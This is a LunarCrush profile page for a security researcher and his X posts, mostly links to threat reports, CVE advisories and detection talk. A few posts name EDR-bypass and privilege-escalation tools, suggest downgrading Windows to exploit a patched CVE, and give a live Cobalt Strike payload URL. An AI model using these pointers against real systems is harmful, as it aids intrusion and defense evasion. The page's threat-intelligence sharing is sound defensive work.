# ![@AndreGironda Avatar](https://lunarcrush.com/gi/w:26/cr:twitter::327015253.png) @AndreGironda Andre Gironda

Andre Gironda posts on X about 6969, microsoft, crowdstrike, apt the most. They currently have [-----] followers and [---] posts still getting attention that total [---] engagements in the last [--] hours.

### Engagements: [---] [#](/creator/twitter::327015253/interactions)
![Engagements Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::327015253/c:line/m:interactions.svg)

- [--] Week [-----] -66%
- [--] Month [------] -61%
- [--] Months [------] +105%
- [--] Year [------] +1,162%

### Mentions: [--] [#](/creator/twitter::327015253/posts_active)
![Mentions Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::327015253/c:line/m:posts_active.svg)

- [--] Week [--] +59%
- [--] Month [--] +135%
- [--] Months [---] -12%
- [--] Year [---] +529%

### Followers: [-----] [#](/creator/twitter::327015253/followers)
![Followers Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::327015253/c:line/m:followers.svg)

- [--] Week [-----] +0.48%
- [--] Month [-----] +3.50%
- [--] Months [-----] +11%
- [--] Year [-----] +27%

### CreatorRank: [---------] [#](/creator/twitter::327015253/influencer_rank)
![CreatorRank Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::327015253/c:line/m:influencer_rank.svg)

### Social Influence

**Social category influence**
[technology brands](/list/technology-brands)  [stocks](/list/stocks)  [finance](/list/finance)  [social networks](/list/social-networks)  [cryptocurrencies](/list/cryptocurrencies)  [countries](/list/countries)  [travel destinations](/list/travel-destinations)  [exchanges](/list/exchanges) 

**Social topic influence**
[6969](/topic/6969), [microsoft](/topic/microsoft), [crowdstrike](/topic/crowdstrike), [apt](/topic/apt), [ai](/topic/ai), [splunk](/topic/splunk), [polyswarm](/topic/polyswarm), [azure](/topic/azure), [github](/topic/github), [events](/topic/events)

**Top assets mentioned**
[Microsoft Corp. (MSFT)](/topic/microsoft) [Crowdstrike Holdings Inc (CRWD)](/topic/crowdstrike) [PolySwarm (NCT)](/topic/polyswarm) [Alphabet Inc Class A (GOOGL)](/topic/$googl) [Zscaler Inc (ZS)](/topic/$zs) [Cloudflare, Inc. (NET)](/topic/cloudflare) [BlackBerry Limited (BB)](/topic/blackberry) [Fortinet Inc (FTNT)](/topic/fortinet) [CyberConnect (CYBER)](/topic/cyber) [Avail (AVAIL)](/topic/avail) [TROLL (TROLL)](/topic/troll) [FilesCoins Power Cu (FILECOIN)](/topic/files) [QUALCOMM, Inc. (QCOM)](/topic/qualcomm)
### Top Social Posts
Top posts by engagements in the last [--] hours

"GuLoader Malware Disguised as Tax Invoices and Shipping Statements -- https://asec.ahnlab.com/en/55978/ https://asec.ahnlab.com/en/55978/"  
[X Link](https://x.com/anyuser/status/1690083049550282753)  2023-08-11T19:29Z [----] followers, [---] engagements


"UNC4841 Targeting Government Entities with Barracuda ESG 0day -- https://blog.polyswarm.io/unc4841-targeting-government-entities-with-barracuda-esg-0day-cve-2023-2868 https://blog.polyswarm.io/unc4841-targeting-government-entities-with-barracuda-esg-0day-cve-2023-2868"  
[X Link](https://x.com/AndreGironda/status/1698754305329856545)  2023-09-04T17:46Z [----] followers, [---] engagements


"Downloader Disguised With Contents on Violation of Intellectual Property Rights --"  
[X Link](https://x.com/AndreGironda/status/1702718245898420309)  2023-09-15T16:17Z [----] followers, [---] engagements


"@redcanary Are these crimeware actors Do they recruit in Russian Federation circles What are their overall characteristics and motives e.g. targeting objectives etc"  
[X Link](https://x.com/AndreGironda/status/1707777370374148245)  2023-09-29T15:20Z [----] followers, [--] engagements


"@jsecurity101 Why does S1 have 10x the telem requirements as CrowdStrike and perhaps related why does CrowdStrike miss detections on so many red-team payloads"  
[X Link](https://x.com/AndreGironda/status/1707778541830672720)  2023-09-29T15:25Z [----] followers, [--] engagements


"@HackingLZ Justin [-----] percent of what you say expertise-wise is correct. I think you failed today. There are plenty of OST that bypass EDRs including post activity such as lsass dumping. Maybe not in a single git pull Ill give you that. Try synthesizing a beacon with side loading"  
[X Link](https://x.com/AndreGironda/status/1710383597188972910)  2023-10-06T19:56Z [----] followers, [---] engagements


"MedusaLocker Ransomware an In-Depth Technical Analysis and Prevention Strategies --"  
[X Link](https://x.com/AndreGironda/status/1714379604432245055)  2023-10-17T20:35Z [----] followers, [---] engagements


"@jfslowik What are the effects of job-hopping detection tools (for recruiters et al) in combination with RTO mandates reduction of wage compression and new hire onboarding to RTO mandate programs Does this mean that wage compression is also solved for businesses"  
[X Link](https://x.com/AndreGironda/status/1715097071890641337)  2023-10-19T20:06Z [----] followers, [--] engagements


"@ImposeCost I read the thread. had discussions like these 10+ years ago. Its a good topic to revisit occasionally. Everyone did their part. APT is still APT. Theres no SuperAPT or one APT to rule them all. mission-driven budget etc dont change it. Mercenaries are Mercenaries too"  
[X Link](https://x.com/AndreGironda/status/1741877853850050871)  2024-01-01T17:43Z [----] followers, [---] engagements


"Security Update for Ivanti Connect Secure and Ivanti Policy Secure Gateways (CVE-2023-46805 CVE-2024-21887) --"  
[X Link](https://x.com/AndreGironda/status/1745184706419896777)  2024-01-10T20:43Z [----] followers, [---] engagements


"@likethecoins Also agree; and great deck. What is the thought around when no access expansion occurs E.g. MOVEit FTA etc. The cloud or device with the RCE is the crown jewels. Bob doesnt secret with Alice except Eve can steal but rather Bob steals from Alice and sells to Eve"  
[X Link](https://x.com/anyuser/status/1745967636343836793)  2024-01-13T00:34Z [--] followers, [---] engagements


"@TheDFIRReport RecordedFuture refers to a similar actor as TAG-100 . Could be that TAG-100 and UNC4936 are exactly the same intrusion set. I have both actors under the APT5 Umbrella as "investigate these" but it's curious they may be the same"  
[X Link](https://x.com/AndreGironda/status/1820901884502405330)  2024-08-06T19:16Z [----] followers, [--] engagements


"@TheDFIRReport For the TAG-100 Cobalt Strike payload sighted http://www.megtech.xyz:443/jquery-3.7.2.slim.min.js with watermark [---------] -- its payload contained both a normal Beacon and a stager payload. I'm sure this has happened before but very-unusual"  
[X Link](https://x.com/AndreGironda/status/1820903279813087277)  2024-08-06T19:22Z [----] followers, [--] engagements


"@blackorbird APT-C-60 (False Hunter) is related to APT-Q-12 (Pseudo Hunter) and with both having roots in Darkhotel (APT-C-06) just to hopefully confuse you less somehow"  
[X Link](https://x.com/AndreGironda/status/1829170241483747802)  2024-08-29T14:52Z [----] followers, [--] engagements


"@StrikeReadyLabs RNAME - karlzeeb673@proton.me - ProtonCreateTimeDate: 2024-08-08 01:03:56"  
[X Link](https://x.com/AndreGironda/status/1831070097571750140)  2024-09-03T20:41Z [----] followers, [--] engagements


"@G60930953 @Threatlabz The targeted BlindEagle loader discovered by the BlackBerry team in late [----] is one small example. Yes APT-C-36 is less-funded than other APT. Yes they have shown some financial-criminal focus at times Yes they lever commodity malware sometimes. They also used Seatbelt tho"  
[X Link](https://x.com/AndreGironda/status/1833153916114252205)  2024-09-09T14:42Z [----] followers, [--] engagements


"Progress Kemp LoadMaster CVE-2024-7591 -- https://insinuator.net/2024/09/announcement-progress-kemp-loadmaster-cve-2024-7591/ https://insinuator.net/2024/09/announcement-progress-kemp-loadmaster-cve-2024-7591/"  
[X Link](https://x.com/AndreGironda/status/1833158258699436255)  2024-09-09T14:59Z [----] followers, [--] engagements


"Kremlin-linked COLDRIVER crooks take pro-democracy NGOs for phishy ride -- https://www.theregister.com/2024/09/09/russia_coldriver_ngo_phishing/ https://www.theregister.com/2024/09/09/russia_coldriver_ngo_phishing/"  
[X Link](https://x.com/AndreGironda/status/1833158445295628350)  2024-09-09T15:00Z [----] followers, [---] engagements


"@MalwareJake GenAI-based ATS is the number one reason that false denials occur. Orgs are getting the wrong job candidates and the ATS is throwing away all of the good candidates"  
[X Link](https://x.com/AndreGironda/status/1833169020356538629)  2024-09-09T15:42Z [----] followers, [--] engagements


"Are any other cybersecurity experts disgusted by Ivanti Sonicwall Atlassian and Fortinet for being primary sources of cyber conflict These "for-profit companies" need forced governance -- -- where is the FTC to guide them https://www.ivanti.com/blog/september-2024-security-update https://www.ivanti.com/blog/september-2024-security-update"  
[X Link](https://x.com/AndreGironda/status/1833592803747893317)  2024-09-10T19:46Z [----] followers, [--] engagements


"@_wald0 How to best handle the supernode problem (i.e. the graph Hairball effect) Remove supernodes or represent nodes as properties Or use e.g Cypher Planner to provide join/label/query hints Or other alternative (e.g. graph algo without graphdb subgraph et al)"  
[X Link](https://x.com/AndreGironda/status/1843712449205379304)  2024-10-08T17:57Z [----] followers, [--] engagements


"@_wald0 I get that -- have a problem to solve and work it typically via query tuning. Looking for places you went that both did and didn't work and threw out a few of my own paths in pathing"  
[X Link](https://x.com/AndreGironda/status/1843728944262193373)  2024-10-08T19:03Z [----] followers, [--] engagements


"CVE-2024-47561: Apache Avro arbitrary class instantiation -- http://expertmiami.blogspot.com/2024/10/cve-2024-47561-apache-avro-arbitrary.html http://expertmiami.blogspot.com/2024/10/cve-2024-47561-apache-avro-arbitrary.html"  
[X Link](https://x.com/AndreGironda/status/1844454374753624312)  2024-10-10T19:06Z [----] followers, [---] engagements


"@greglesnewich I think from a money perspective secondary markets and defaults will continue. For those above those lines we still are not safe from restructuring. We are definitely not safe from flat growth and bad-looking numbers. This has deep effects on staff especially our field"  
[X Link](https://x.com/AndreGironda/status/1844747111776096747)  2024-10-11T14:29Z [----] followers, [--] engagements


"@greglesnewich @HackingLZ Purchased dozens of rolls of Gaming Paper Colors [--] Hex Rolls in Black and use Sharpies and Gelly Roll pens to create space maps and fantasy world maps. It's basically wrapping paper. TTRPGs allow a mid (PDFs on iPads epaper etc) and low-level (hardcopy books) escape for me"  
[X Link](https://x.com/AndreGironda/status/1844749512255865250)  2024-10-11T14:38Z [----] followers, [--] engagements


"Exploring GenAI in Cybersecurity: Gemini for Malware Analysis -- https://www.gdatasoftware.com/blog/2024/10/38042-generative-ai-for-malware-analysis/ https://www.gdatasoftware.com/blog/2024/10/38042-generative-ai-for-malware-analysis/"  
[X Link](https://x.com/AndreGironda/status/1844806979421675908)  2024-10-11T18:27Z [----] followers, [--] engagements


"@chrissanders88 Execute query -- ((eid = "4688" or eid = "1") and ((regex(proc.cli .*cmd.*) and regex(proc.cli .*/K.*) and regex(proc.cli .*/Q.*)) or (regex(proc.cli .*/q.*) or regex(proc.cli .*/K.*) or regex(proc.cli .*echo.*) or regex(proc.cli .*%CoMSpEC%.*))))"  
[X Link](https://x.com/AndreGironda/status/1861788725115510939)  2024-11-27T15:06Z [----] followers, [--] engagements


"@anton_chuvakin Not in 3+ decades of working with SIM SEM and SIEM. Never once. SIEM is a total failure. GenAI Cybersecurity tools won't find those either. People do -- and MOST of the time they're not detection engineers blue team or even cyber or infosec people at all"  
[X Link](https://x.com/anyuser/status/1864022195405525107)  2024-12-03T19:01Z [----] followers, [----] engagements


"Russian users report Gazprombank outages amid alleged Ukrainian cyberattack -- https://therecord.media/gazprombank-outages-russia-ukraine-claims-cyberattack https://therecord.media/gazprombank-outages-russia-ukraine-claims-cyberattack"  
[X Link](https://x.com/AndreGironda/status/1865030353057956038)  2024-12-06T13:47Z [----] followers, [--] engagements


"@banthisguy9349 Cyber Defense is not getting stronger"  
[X Link](https://x.com/AndreGironda/status/1867298550264345036)  2024-12-12T20:00Z [----] followers, [--] engagements


"@BleepinComputer @serghei CVE-2023-29360 and CVE-2024-35250 in mskssrv.sys/ks.sys are usually detected by Windows_Exploit_IoRing.yar or Windows_Exploit_Generic.yar with the [----] POC avail since Oct 12"  
[X Link](https://x.com/AndreGironda/status/1868763953972826378)  2024-12-16T21:03Z [----] followers, [---] engagements


"Malware Analysis of Amadey -- https://medium.com/@psyb3rm0nk/malware-analysis-amadey-d0e32b54aee5 https://medium.com/@psyb3rm0nk/malware-analysis-amadey-d0e32b54aee5"  
[X Link](https://x.com/anyuser/status/1871629975025254909)  2024-12-24T18:52Z [----] followers, [----] engagements


"@Dave_Maynor My guess is that you mean PCI DSS and it was Circuit City that really screwed the pooch but the audit community was already abuzz from the Andersen-Enron scandal and resulting push for Sarbanes-Oxley in the aftermath"  
[X Link](https://x.com/AndreGironda/status/1872648583469727898)  2024-12-27T14:19Z [----] followers, [--] engagements


"@eliedelkind @IceSolst @nojonesuk https://www.csoonline.com/article/3537228/crowdstrike-outage-redefines-edr-market-emphasis.html https://www.csoonline.com/article/3537228/crowdstrike-outage-redefines-edr-market-emphasis.html"  
[X Link](https://x.com/AndreGironda/status/1879598918381834697)  2025-01-15T18:37Z [----] followers, [--] engagements


"@nojonesuk @eliedelkind @IceSolst [---] percent -- Deploying CDR via Ambassador/Proxy/Sidecar patterns DaemonSets as-a K8s Service or Init Container is better than cron schedtasks or MSI/WMI/RPM/etc. We're not crimegangs really"  
[X Link](https://x.com/AndreGironda/status/1879601895377088583)  2025-01-15T18:49Z [----] followers, [--] engagements


"@eliedelkind @nojonesuk @IceSolst We (i.e. the world) abandoned EC2 in favor of about a dozen other cloud-native ASMisms including AWS Lambda AWS Step Functions AWS Batch and others -- mostly serverless to boot. Even Matano is cloud-native. Don't have to trust a cloud provider to use these; trust-but verify"  
[X Link](https://x.com/AndreGironda/status/1879608580430836126)  2025-01-15T19:16Z [----] followers, [--] engagements


"@eliedelkind @nojonesuk @IceSolst EC2 or whatever cloud IaaS opts can easily be joined to k8s and run another layer of k8s so where are the controls there EDR doesn't help or provide telem; CDR does"  
[X Link](https://x.com/AndreGironda/status/1879610392647012734)  2025-01-15T19:23Z [----] followers, [--] engagements


"@eliedelkind @nojonesuk @IceSolst Hey look I think from the start (not now but about [--] hours ago) we both thought maybe each other was a troll. Can you leave that sort of lang out of this convo Nobody is a "troll". People are good people. Ad hominem much I hope you stop using EDR entirely soon. We all hope"  
[X Link](https://x.com/AndreGironda/status/1879610888598257905)  2025-01-15T19:25Z [----] followers, [--] engagements


"@IceSolst @EricaZelic The problem is that CrowdStrike was never meant to be or want to be an AV. They called that piece NGAV to compete and win. Most shops have been using EDR wrong this entire decade. They literally stovepipe the EDR into their existing AV SecEng teams"  
[X Link](https://x.com/AndreGironda/status/1879615863374205155)  2025-01-15T19:45Z [----] followers, [--] engagements


"@IceSolst @EricaZelic The answer that most orgs CrowdStrike and when clouding around go for Palo PrismaCloud is exactly this problem. Sysdig is a partial solution for both. Where is the full single-pane solution tho"  
[X Link](https://x.com/AndreGironda/status/1879616558261305352)  2025-01-15T19:48Z [----] followers, [---] engagements


"@Mot0Dan @IceSolst @EricaZelic CNAPP/CIEM/CSPM provides a bit more when tied to CDR compared to "a classic EDR-for cloud agent with a CWPP aside" which Elastic CrowdStrike and even Sysdig are. For true CDR we think of Wiz Defend or componentry such as as AWSGD AzureDfC or GCPSCC"  
[X Link](https://x.com/AndreGironda/status/1879658933335531737)  2025-01-15T22:36Z [----] followers, [--] engagements


"@Mot0Dan @IceSolst @EricaZelic fwd:cloudsec please too. I know that course It's on my list Have any good ones for AWS I was thinking PwnedLabs over Hacktricks"  
[X Link](https://x.com/AndreGironda/status/1879660367183573117)  2025-01-15T22:42Z [----] followers, [--] engagements


"@IceSolst Use local models via ollama They hallucinate less (overall perplexity and predictability scores are better than cloud-based models) you can find some to be uncensored (well-aligned for cyber) and they are easier to work with in terms of seed files and custinstructs"  
[X Link](https://x.com/AndreGironda/status/1879951899044302996)  2025-01-16T18:00Z [----] followers, [---] engagements


"Job Offer or Cyber Trap Fake CrowdStrike Recruiters Deliver Malware -- https://medium.com/@Mo.Elshaheedy/job-offer-or-cyber-trap-fake-crowdstrike-recruiters-deliver-malware-567b1ca70253 https://medium.com/@Mo.Elshaheedy/job-offer-or-cyber-trap-fake-crowdstrike-recruiters-deliver-malware-567b1ca70253"  
[X Link](https://x.com/AndreGironda/status/1880379644425433595)  2025-01-17T22:20Z [----] followers, [---] engagements


"@Jhaddix With GenAI Defense and Offense are still the same double-edge. Learning to Probe Systems and People will continue to be core skills. Arch and Eng around AI must be Unix-philosophy style for proper alignment"  
[X Link](https://x.com/anyuser/status/1883167056708997494)  2025-01-25T14:56Z [----] followers, [---] engagements


"Weaponizing Background Images For Information Disclosure && LPE: AnyDesk CVE-2024-12754 ZDI-24-1711 -- https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754 https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754"  
[X Link](https://x.com/AndreGironda/status/1889139499135025198)  2025-02-11T02:28Z [----] followers, [---] engagements


"@chrissanders88 This is a difficult one to attribute to either legit user activity or to a specific actor when not -- especially when not in combo with other malicious or suspicious activities. If the file is named screen.jpeg then it's likely the PUP JavaUpdtr -- https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr"  
[X Link](https://x.com/AndreGironda/status/1896947559035466206)  2025-03-04T15:35Z [----] followers, [---] engagements


"@chrissanders88 Splunk has a page up on the T1113: Screen Capture TTP -- -- mentioning many of the actors and current-running capturecraft https://research.splunk.com/endpoint/5e0b1936-8f99-4399-8ee2-9edc5b32e170/ https://research.splunk.com/endpoint/5e0b1936-8f99-4399-8ee2-9edc5b32e170/"  
[X Link](https://x.com/AndreGironda/status/1896947836996223177)  2025-03-04T15:36Z [----] followers, [--] engagements


"@chrissanders88 Here also Splunk team has provided a log to loosely detect pieces to this technique but with focus on the actor Winter Vivern -- -- which CERT-UA first sighted here -- https://x.com/_CERT_UA/status/1620781684257091584 https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/malware/winter-vivern/pwh_exfiltration/windows-powershell-xml.log UAC-0114 aka Winter Vivern to target Ukrainian and Polish GOV entities CERT_UA In cooperation with PL colleagues detected web pages which mimic government agencies' websites and lure users to download #malware software."  
[X Link](https://x.com/AndreGironda/status/1896948545065996602)  2025-03-04T15:39Z [----] followers, [---] engagements


"LLMjacking -- stealing models intruding into GenAI platforms via AWS API keys -- https://entro.security/blog/llmjacking-in-the-wild-how-attackers-recon-and-abuse-genai-with-aws-nhis/ https://entro.security/blog/llmjacking-in-the-wild-how-attackers-recon-and-abuse-genai-with-aws-nhis/"  
[X Link](https://x.com/AndreGironda/status/1897308127432937974)  2025-03-05T15:28Z [----] followers, [---] engagements


"@anton_chuvakin I think yaral is super-ugly and that KQL is really easy and provoking. What's funny is that YARA itself is my fave and I tend to write Sigma like I would YARA. Google SecOpsTI is nice though but billions of yaral makes it ugly and cumbersome"  
[X Link](https://x.com/AndreGironda/status/1897755158433742896)  2025-03-06T21:04Z [----] followers, [---] engagements


"@K1ngCr4zy @anton_chuvakin Everything beats SPL. SPL works slowly across a 2008-era modified-MapR algo. [----] called and wants their Splunk-Cisco budget back"  
[X Link](https://x.com/AndreGironda/status/1897759603406024968)  2025-03-06T21:22Z [----] followers, [---] engagements


"@ImposeCost SpecterOps and NetSPI. Chronicle Splunk and Sigma all have giant free github repos full of Azure detections. If you need help with one please ask me. is also very good -- take a few -- and the Antisyphon ones can even be free last I checked http://NetworkDefense.io http://NetworkDefense.io"  
[X Link](https://x.com/anyuser/status/1897777980589719671)  2025-03-06T22:35Z [----] followers, [----] engagements


"Fake BTS Attack was Leveraged to Send Bank Mandiri SMS Phishing aka SMShing Attack -- https://ismail-hakim.medium.com/fake-bts-attack-was-leveraged-to-send-bank-mandiri-sms-phishing-aka-smshing-attack-439b9764465c https://ismail-hakim.medium.com/fake-bts-attack-was-leveraged-to-send-bank-mandiri-sms-phishing-aka-smshing-attack-439b9764465c"  
[X Link](https://x.com/AndreGironda/status/1898022545187913807)  2025-03-07T14:46Z [----] followers, [---] engagements


"@SentinelOne Can't solve problems if you can't comm (during a crisis that's why it's called Crisis Communications PR and similar). Can't spend time on experimenting or building if you're always in crisis mode. For cybersecurity that means defining an incident and providing SOC authority"  
[X Link](https://x.com/AndreGironda/status/1899211789474398363)  2025-03-10T21:32Z [----] followers, [---] engagements


"Fortinet FG-IR-24-325 -- FortiOS FortiProxy FortiPAM FortiSRA and FortiWeb multiple format string vulnerabilities -- CVE-2024-45324 -- https://fortiguard.fortinet.com/psirt/FG-IR-24-325 https://fortiguard.fortinet.com/psirt/FG-IR-24-325"  
[X Link](https://x.com/AndreGironda/status/1899516834959036805)  2025-03-11T17:44Z [----] followers, [---] engagements


"CVE-2025-20908 Use of insufficiently random values in Samsungs Auracast implementation -- https://insinuator.net/2025/03/cve-2025-20908-use-of-insufficiently-random-values-in-samsungs-auracast-implementation/ https://insinuator.net/2025/03/cve-2025-20908-use-of-insufficiently-random-values-in-samsungs-auracast-implementation/"  
[X Link](https://x.com/AndreGironda/status/1900332001963761845)  2025-03-13T23:43Z [----] followers, [---] engagements


"@ImposeCost Take the CJCSM 6510.01B AppA-to EncB. Each tabled crisis-incident-event cycle or path has a column for precedence and category. These are used to denote which events become incidents e.g. executed or installed malicious logic is an incident but unsuccess activity attempt is not"  
[X Link](https://x.com/AndreGironda/status/1901302641675915390)  2025-03-16T16:00Z [----] followers, [---] engagements


"Akamai Edimax cameras used to spread Mirai -- https://www.akamai.com/blog/security-research/2025/mar/march-edimax-cameras-command-injection-mirai https://www.akamai.com/blog/security-research/2025/mar/march-edimax-cameras-command-injection-mirai"  
[X Link](https://x.com/AndreGironda/status/1901654836963389495)  2025-03-17T15:20Z [----] followers, [--] engagements


"Veriti OpenAI under attack -- CVE-2024-27564 actively-exploited in-the wild -- https://veriti.ai/blog/cve-2024-27564-actively-exploited/ https://veriti.ai/blog/cve-2024-27564-actively-exploited/"  
[X Link](https://x.com/anyuser/status/1901818083737801206)  2025-03-18T02:08Z [----] followers, [----] engagements


"@_RastaMouse itm4n/PrivescCheck RealBlindingEDR Reaper CVE-2022-34709 and (indirectly) -- swisskyrepo/SharpLAPS rdps-remote-credential-guard-with-rubeus-ptt (bypass RCG) plus Outflank"  
[X Link](https://x.com/anyuser/status/1902133648301945150)  2025-03-18T23:02Z [----] followers, [----] engagements


"@_RastaMouse Oh yeah if you want to exploit CVE-2022-34709 but find it's patched use WindowsDowndate or similar"  
[X Link](https://x.com/AndreGironda/status/1902134289728467247)  2025-03-18T23:05Z [----] followers, [---] engagements


"@chrissanders88 From experience it is possible to see patterns to known DGAs. Any subdomain patterns present in the malFQDNs Any SERVFAIL=2 NXDOMAIN=3 result codes Any TXT or other non-standard records resolved"  
[X Link](https://x.com/AndreGironda/status/1902299346487669028)  2025-03-19T10:01Z [----] followers, [---] engagements


"@chrissanders88 Splunk seems to think this catch-all is a bad idea and deprecated it -- https://research.splunk.com/deprecated/74ec6f18-604b-4202-a567-86b2066be3ce/ https://research.splunk.com/deprecated/74ec6f18-604b-4202-a567-86b2066be3ce/"  
[X Link](https://x.com/AndreGironda/status/1902301930308956438)  2025-03-19T10:11Z [----] followers, [--] engagements


"Oracle cloud OCI breach denial falls apart -- new evidence lands hard -- https://www.flyingpenguin.com/p=68832 https://www.flyingpenguin.com/p=68832"  
[X Link](https://x.com/AndreGironda/status/1904610732572090834)  2025-03-25T19:05Z [----] followers, [---] engagements


"Oracle cloud infrastructure OCI client data leaked to cybercrime forum -- https://labs.beazley.security/advisories/BSL-A1115 https://labs.beazley.security/advisories/BSL-A1115"  
[X Link](https://x.com/AndreGironda/status/1904618789469380712)  2025-03-25T19:38Z [----] followers, [----] engagements


"The Lucid Phishing-as-a-Service (PhAAS) platform developed by the XinXin group -- -- Utilizing advanced technologies like RCS and iMessage the group employs automated tools and evasion techniques to bypass detection. Key actors such as LARVA-242 https://catalyst.prodaft.com/public/report/lucid/overview https://catalyst.prodaft.com/public/report/lucid/overview"  
[X Link](https://x.com/AndreGironda/status/1905090699378459000)  2025-03-27T02:53Z [----] followers, [---] engagements


"Fortinets FortiClient Endpoint Management Server (EMS) SQL injection CVE-2023-48788 -- https://darktrace.com/blog/forticlient-ems-exploited-inside-the-attack-chain-and-post-exploitation-tactics https://darktrace.com/blog/forticlient-ems-exploited-inside-the-attack-chain-and-post-exploitation-tactics"  
[X Link](https://x.com/AndreGironda/status/1905657864246755625)  2025-03-28T16:26Z [----] followers, [---] engagements


"Fake Booking lures target hospitality and hotels -- https://www.threatdown.com/blog/fake-booking-com-emails-target-hotels https://www.threatdown.com/blog/fake-booking-com-emails-target-hotels"  
[X Link](https://x.com/AndreGironda/status/1907793109620318409)  2025-04-03T13:51Z [----] followers, [---] engagements


"CVE-2025-27520 RCE in BentoML details -- https://checkmarx.com/zero-post/bentoml-rce-fewer-affected-versions-cve-2025-27520/ https://checkmarx.com/zero-post/bentoml-rce-fewer-affected-versions-cve-2025-27520/"  
[X Link](https://x.com/AndreGironda/status/1911788978665345450)  2025-04-14T14:29Z [----] followers, [---] engagements


"CVE-2025-30406 - Critical Gladinet CentreStack & Triofox exploited in-the wild -- https://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild https://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild"  
[X Link](https://x.com/AndreGironda/status/1911810934856925297)  2025-04-14T15:57Z [----] followers, [---] engagements


"RedCanary Critical CVE-2025-31324 in SAP NetWeaver enables malicious file uploads -- https://redcanary.com/blog/threat-intelligence/cve-2025-31324/ https://redcanary.com/blog/threat-intelligence/cve-2025-31324/"  
[X Link](https://x.com/AndreGironda/status/1917687840537821325)  2025-04-30T21:09Z [----] followers, [---] engagements


"SAP NetWeaver exploitation of CVE-2025-31324 -- https://labs.withsecure.com/publications/netweaver-cve-2025-31324 https://labs.withsecure.com/publications/netweaver-cve-2025-31324"  
[X Link](https://x.com/AndreGironda/status/1917941795172024520)  2025-05-01T13:58Z [----] followers, [---] engagements


"@RedTeamTactics Downloading malicious logic is an Event. Executing or Installing malicious logic are Incidents. Events can lead to Incidents but only Incidents come with a promise of "cleanup on aisle four""  
[X Link](https://x.com/anyuser/status/1919078620603068636)  2025-05-04T17:16Z [----] followers, [---] engagements


"@RLMLDL ocrmypdf --redo_ocr works nicely here but curious on other recommendations. I understand yours is proprietary but this might be a nice area to allow others to explore a bit under-the hood and help the community of others attempting similar"  
[X Link](https://x.com/AndreGironda/status/1919785938353561982)  2025-05-06T16:06Z [----] followers, [--] engagements


"CyberArmor Social Security statement lures targets over 2k victims with ScreenConnect Tool -- https://cyberarmor.tech/hacker-exploit-social-security-statement-theme-to-target-over-2000-victims-with-malware https://cyberarmor.tech/hacker-exploit-social-security-statement-theme-to-target-over-2000-victims-with-malware"  
[X Link](https://x.com/AndreGironda/status/1920821206447542381)  2025-05-09T12:40Z [----] followers, [--] engagements


"SublimeSec ScreenConnect as malware via Canva abuse and DocuSign impersonation -- https://sublime.security/blog/screenconnect-as-malware-via-canva-abuse-and-docusign-impersonation/ https://sublime.security/blog/screenconnect-as-malware-via-canva-abuse-and-docusign-impersonation/"  
[X Link](https://x.com/AndreGironda/status/1920829482698428576)  2025-05-09T13:13Z [----] followers, [--] engagements


"FortiNet CVE-2025-32756 -- FG-IR-25-254 -- Stack-based buffer overflow vulnerability in API -- https://fortiguard.fortinet.com/psirt/FG-IR-25-254 https://fortiguard.fortinet.com/psirt/FG-IR-25-254"  
[X Link](https://x.com/AndreGironda/status/1922345971435913563)  2025-05-13T17:39Z [----] followers, [---] engagements


"ASEC Etherhide using blockchain for c2 -- https://asec.ahnlab.com/en/88009/ https://asec.ahnlab.com/en/88009/"  
[X Link](https://x.com/AndreGironda/status/1924471825570148622)  2025-05-19T14:26Z [----] followers, [--] engagements


"@chrissanders88 Could be a C2 config being pulled down in order to consume (by the malware) and then use as transports likely connecting to one a time either first last or selected randomly from the list; trying the others when the initial(s) don't connect. Onimai malware uses Gist this way"  
[X Link](https://x.com/anyuser/status/1927467638784925703)  2025-05-27T20:51Z [----] followers, [---] engagements


"@chrissanders88 I would rule out the leading signs of Onimai RAT QuasarRat or SLUB backdoor by specifically checking for their malware profiles but YARA rules can aid this triage process. Read any-all code especially around the control and data paths near that Gist snag"  
[X Link](https://x.com/AndreGironda/status/1927470099453112716)  2025-05-27T21:00Z [----] followers, [--] engagements


"@omarsar0 RAG is -- plainly -- document scanning. It's what we thought we could do with ElasticSearch in 2013-2014 but could only really figure out a decade later. Is it coming up short A bit but the GenAI experiments continue. We have a long way to go"  
[X Link](https://x.com/AndreGironda/status/1927792371527209234)  2025-05-28T18:21Z [----] followers, [--] engagements


"@IceSolst UI-UX with GenAI tools : Framer Galileo AI and Uizard"  
[X Link](https://x.com/AndreGironda/status/1928186453097337133)  2025-05-29T20:27Z [----] followers, [--] engagements


"@DanielMiessler It's been a slow roll over [--] decades for Detroit. There were some mass layoffs but they didn't necessarily coincide with new FANUCs showing up. Plus FANUC etc has hired how many people over the decades The world isn't different now in every way. You're showing corner cases"  
[X Link](https://x.com/AndreGironda/status/1928837355084849379)  2025-05-31T15:33Z [----] followers, [--] engagements


"@DanielMiessler It won't be the same. Not lumped into everything or even a category (i.e. what is education). Ed as we know it is metered by policy. You should go into policy Dan. GenAI tools today have the power to break down the barriers instilled by standardized ed which create your gap"  
[X Link](https://x.com/AndreGironda/status/1928925110532190507)  2025-05-31T21:22Z [----] followers, [---] engagements


"@chrissanders88 Working back to the JavaScript file and the Github paths themselves the timelines from their artifacts can be matched to what was found in the deep pDNS analysis. There are a few Github osint checks that may include dumping the owners (emails) of the repos and other factors"  
[X Link](https://x.com/AndreGironda/status/1929905090988781608)  2025-06-03T14:16Z [----] followers, [---] engagements


"Cofense ClickFix campaign Bookingcom lures deliver malware -- https://cofense.com/blog/clickfix-campaign-spoofs-booking-com-for-malware-delivery https://cofense.com/blog/clickfix-campaign-spoofs-booking-com-for-malware-delivery"  
[X Link](https://x.com/AndreGironda/status/1930446202354708821)  2025-06-05T02:06Z [----] followers, [---] engagements


